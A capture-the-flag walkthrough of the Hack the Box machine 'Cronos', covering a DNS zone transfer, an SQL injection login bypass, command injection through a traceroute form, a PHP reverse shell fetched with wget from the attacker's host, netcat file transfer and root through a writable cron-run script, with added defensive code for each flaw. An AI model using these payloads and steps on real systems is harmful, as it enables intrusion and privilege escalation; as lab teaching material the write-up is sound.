Cronos — Hack the Box Writeup
A Hack the Box machine rated Medium difficulty running Linux.

Starting out we will run our usual Nmap scan to get a sense of what is running on this box.
kali@kali:~/Documents/htb/cronos$ nmap -sC -sV -oA nmap 10.10.10.13
Our output is as follows:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-24 17:50 EDT
Nmap scan report for 10.10.10.13
Host is up (0.041s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.82 seconds
We see that we have SSH on port 22/tcp, DNS on 53/tcp, and Apache web server on port 80/tcp.
The DNS server is interesting: it is listening on 53/tcp, and TCP is the transport used when an entire zone is transferred, so this could reasonably allow a DNS zone transfer that would give us a map of the whole zone.
Since this is quite unusual to see, let’s check this out first before looking into the web server. We can investigate the DNS with a few commands, and we are going to go over two of the ones I like to use here:
- nslookup: lets us connect to a server and do a reverse name server lookup
- dig: lets us perform a zone transfer
Because we found the name server above, ns1.cronos.htb, we can drop the name server portion of the address and are left with the domain name cronos.htb. Using this information we can use dig to perform a zone transfer with the following options.
kali@kali:~$ dig axfr cronos.htb @10.10.10.13
; <<>> DiG 9.11.14-3-Debian <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 39 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Mon Aug 24 22:09:08 EDT 2020
;; XFR size: 7 records (messages 1, bytes 203)
We found multiple new subdomains that would otherwise have been unknown. We need to add these domains to our /etc/hosts file so that we can use them in the browser as we would with any other website. Make sure to use the sudo prefix to edit the hosts file since it requires root privileges.

Now that we have the host file updated with our found domains, we are ready to explore these domains in the browser.
cronos.htb and www.cronos.htb both return the same webpage:

All these links are to Laravel, a PHP framework that will come in handy later. The admin.cronos.htb site gives us a login page, which is much more interesting!

We can run Gobuster against these sites, but we will not find anything of real significance. With that being said, if we google Laravel exploits we will see a mention of SQL injection.

Because of this, we can use a tool called SQLMAP with a login request to attempt SQLi in both fields on the login page. To get the login request we can simply run BurpSuite and turn Intercept to ON.

Going back to our webpage we make sure that we are proxying our traffic through Burp and send a login request with something simple like admin:admin for credentials. Once we submit the request Burp will capture it. We can copy this into a file in our working directory and name it login.req

Now that we have the login request file we can start SQLMAP using the login request file as an argument instead of entering all the information manually with flags. The options we will be using are -r to signify we are providing a request file, and -vvvv to increase the verbosity of the output.

We let this run until we are informed that there is a SQLi vulnerability with the admin' input. We see this in the payload just before we are notified. We also see that this SQLi vulnerability is located in the USER field.

Using what we found, let’s try creating a payload that modifies the database query so that the password check is commented out.
We can do this because the SQL query looks something like this:
SELECT * FROM login WHERE USERNAME= '$user' and PASSWORD= '$pass';
In the above query the input for the $user variable is not sanitized, so we can enter SQL that will run on the database. We do this by entering any string for the username followed by a single quote. This single quote closes the '$user' argument early, and we can then comment out the rest of the query with --. Putting this all together we end up submitting something like this in the username field: admin' -- * where * can be any string or character that follows the comment marker. Notice that if we submit this without the added character the SQLi is not successful. It does not matter what we put in the password field, as the part of the query that looks up the password has been commented out.
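An added example (not from the writeup) that reproduces the query above against an in-memory SQLite table, side by side with the parameterised form that stops it. The account is constructed; SQLite treats -- as a comment without a following space, whereas MySQL requires whitespace after --, which is why the trailing character matters in the writeup.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the login table with one constructed account.
    The password is stored in clear only to mirror the query shown above;
    real code would compare a salted hash instead."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (USERNAME TEXT, PASSWORD TEXT)")
    db.execute("INSERT INTO login VALUES ('admin', 'correct horse')")
    return db

def executed_sql(user, password):
    """The statement a string-built query hands to the database, verbatim."""
    return (f"SELECT * FROM login WHERE USERNAME= '{user}' "
            f"and PASSWORD= '{password}';")

def vulnerable_login(db, user, password):
    """Built the way the page describes: user input is pasted into the SQL text,
    so a closing quote plus a comment marker ends the WHERE clause before the
    password is ever compared."""
    return db.execute(executed_sql(user, password)).fetchone() is not None

def safe_login(db, user, password):
    """Hardened form: bound parameters travel as data, never as SQL, so a quote
    or '--' inside the username is simply part of the value being compared."""
    row = db.execute("SELECT * FROM login WHERE USERNAME= ? and PASSWORD= ?",
                     (user, password)).fetchone()
    return row is not None

if __name__ == "__main__":
    db = make_db()
    probe = "admin' -- x"
    print(executed_sql(probe, "wrong"))
    print("vulnerable:", vulnerable_login(db, probe, "wrong"))  # True
    print("parameterised:", safe_login(db, probe, "wrong"))    # False
```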

Submitting this we get in and find that there is a traceroute function built into the page.

If we inspect the input field we can get a better idea of how this command is being executed.

We see that there is a simple form that executes the commands ping -c 1 and traceroute. Let’s see if we can add a command onto the end of the traceroute command using a semicolon.
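Added example, not code from the box or the writeup: why pasting the host into a shell command line lets a semicolon start a second command, beside a hardened handler for the same ping/traceroute form that allowlists the tool, validates the host, and runs an argv list with no shell. Tool names and fixed options follow the form described above; the hostname pattern is my own.

```python
import ipaddress
import re
import subprocess

# Allowlisted tools with their fixed options, matching the form described above.
TOOLS = {"ping": ["ping", "-c", "1"], "traceroute": ["traceroute"]}
# RFC 1123 hostname: labels of letters, digits and inner hyphens joined by dots.
# A leading hyphen is rejected as well, so the host can never be read as an option.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")

def vulnerable_command_line(tool, host):
    """What a handler that builds a shell string does: the host is concatenated
    into the command, so a ';' in it terminates the tool and whatever follows
    runs as a second command. Returned as text here, deliberately not executed."""
    return f"{tool} {host}"

def is_valid_host(host):
    """Accept an IPv4/IPv6 address or an RFC 1123 hostname, nothing else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return HOSTNAME_RE.match(host) is not None

def build_argv(tool, host):
    """Hardened: allowlisted tool plus validated host, as an argv list."""
    if tool not in TOOLS:
        raise ValueError(f"tool not allowed: {tool!r}")
    host = host.strip()
    if not is_valid_host(host):
        raise ValueError(f"invalid host: {host!r}")
    return TOOLS[tool] + [host]

def run_tool(tool, host, timeout=30):
    """Run with shell=False: argv elements reach the program literally, so shell
    metacharacters would carry no meaning even if validation were bypassed."""
    completed = subprocess.run(build_argv(tool, host), capture_output=True,
                               text=True, timeout=timeout)
    return completed.stdout
```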

We see that we have code execution on the box as user www-data. Now, let’s turn this into a shell by uploading a PHP reverse shell found in the Laudanum directory in Kali. First, we must figure out if we have a method of uploading files through the command line. Something like wget or curl would work. We can see if we have either of these utilities by using the which command.

We have wget on the machine so let’s use that. Copy the reverse shell into our working directory and edit the IP and port to our attacking machine’s IP and port.

To get this file onto the target machine we can serve our working directory over HTTP and use wget on the target to download it.

Using wget we enter our IP, port 8000 (the default port SimpleHTTPServer listens on), and the name of the reverse shell file. To check that the file was uploaded, we simply run ls on the machine.

The file upload was successful! We can set up our Netcat listener on the port we set in the php-reverse-shell.php file and request the file from the server.

We were able to get a reverse shell back from our target machine! Using a Python shell upgrade command we are able to get a fully interactive TTY shell with tab completion. We also used CTRL+Z followed by stty raw -echo, then fg, to keep ourselves from CTRL+C'ing out of our shell.
Privilege Escalation
We can run some scripts to look for common privilege escalation opportunities. I prefer to run the LinEnum.sh script first. This script can be found on GitHub and can be downloaded using the git clone command. We can once again use wget to upload the script to the target machine.
www-data@cronos:/$ ls
bin home lib64 opt sbin tmp vmlinuz.old
boot initrd.img lost+found proc snap usr
dev initrd.img.old media root srv var
etc lib mnt run sys vmlinuz
www-data@cronos:/$ cd tmp
www-data@cronos:/tmp$ ls
systemd-private-13a26ada00e2453388bf55c49cc7f370-systemd-timesyncd.service-3FWjSj
vmware-root
www-data@cronos:/tmp$ wget http://10.10.14.36:8000/LinEnum.sh
--2020-09-01 21:57:46-- http://10.10.14.36:8000/LinEnum.sh
Connecting to 10.10.14.36:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'
LinEnum.sh 100%[===================>] 45.54K --.-KB/s in 0.1s
2020-09-01 21:57:46 (337 KB/s) - 'LinEnum.sh' saved [46631/46631]
www-data@cronos:/tmp$ bash LinEnum.sh > LinEnum-output.txt
We need to find a directory where our current user can write files. I like to use the /tmp directory. With the script downloaded, we just need to run it. Since the script produces a lot of output we redirect it to a file, which lets us keep better notes on the system. Once the script is done running we can send the output file back to our attacking machine to analyze. We can do this with Netcat.

On our attacking machine we set up a Netcat listener and redirect its output with > into the file name we want to save the output as. On the victim machine we use Netcat to connect back to our attacking machine with < to feed the output file in as its input.
Now that we have the LinEnum output on our kali machine, we can take a look through it to see if there is anything that stands out.

There is a cron job running every minute in which root executes this Laravel artisan file. Since we are user www-data we most likely have access to this Laravel file. If we can replace the contents of this file with a reverse shell we can get a reverse shell with root privileges.

We confirmed that we have access to this artisan file and can modify it. Now, let’s replace the contents of this file with that of php-reverse-shell.php, using a new port, and set up our listener.

Save the file, open up the listener on the correct port, and wait for the cron job to run it at the next minute.
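From the defender's side, the misconfiguration used here is a root cron job whose target file a low-privileged account can modify. Here is an added audit script (my own, not from the writeup or LinEnum) that parses /etc/crontab-style lines and flags privileged jobs whose script or interpreter is owned by an untrusted uid or is group/world writable; the crontab text and files in demo() are constructed, and the artisan file name just stands in for the one on the box.

```python
import os
import stat
import tempfile

def command_paths(command):
    """Absolute paths in a crontab command (interpreter and script alike)."""
    return [tok for tok in command.split() if tok.startswith("/")]

def modifiable_by_untrusted(path, trusted_uids=(0,)):
    """True if the file exists and a non-trusted account could change it: owned
    by an untrusted uid, or group/world write bits set."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    return (st.st_uid not in trusted_uids
            or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)))

def find_unsafe_cron_targets(crontab_text, privileged=("root",), trusted_uids=(0,)):
    """Parse /etc/crontab-style lines (5 time fields, user, command) and return
    (user, path) pairs where a privileged job runs a file others can modify.
    Comments, VAR=value lines and @reboot-style shortcuts are skipped."""
    findings = []
    for line in crontab_text.splitlines():
        fields = line.strip().split(None, 6)
        if len(fields) < 7 or fields[0].startswith(("#", "@")) or "=" in fields[0]:
            continue
        user, command = fields[5], fields[6]
        if user in privileged:
            findings += [(user, p) for p in command_paths(command)
                         if modifiable_by_untrusted(p, trusted_uids)]
    return findings

def demo():
    """Constructed scenario: root runs a world-writable script every minute next
    to a correctly permissioned one. The demo's own uid stands in for root as the
    trusted owner so the result does not depend on who runs it."""
    with tempfile.TemporaryDirectory() as d:
        loose, tight = os.path.join(d, "artisan"), os.path.join(d, "backup.sh")
        for path, mode in ((loose, 0o666), (tight, 0o644)):
            open(path, "w").close()
            os.chmod(path, mode)
        crontab = ("SHELL=/bin/sh\n"
                   f"* * * * * root /usr/bin/php {loose}\n"
                   f"0 3 * * * root {tight}\n")
        hits = find_unsafe_cron_targets(crontab, trusted_uids=(os.getuid(),))
        return [os.path.basename(p) for _user, p in hits]
```

Against a real host, feed it the contents of /etc/crontab and /etc/cron.d/* and keep the default trusted uid of 0.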

And there we have it! A root shell on Hack the Box machine Cronos. This completes the walkthrough, happy hacking!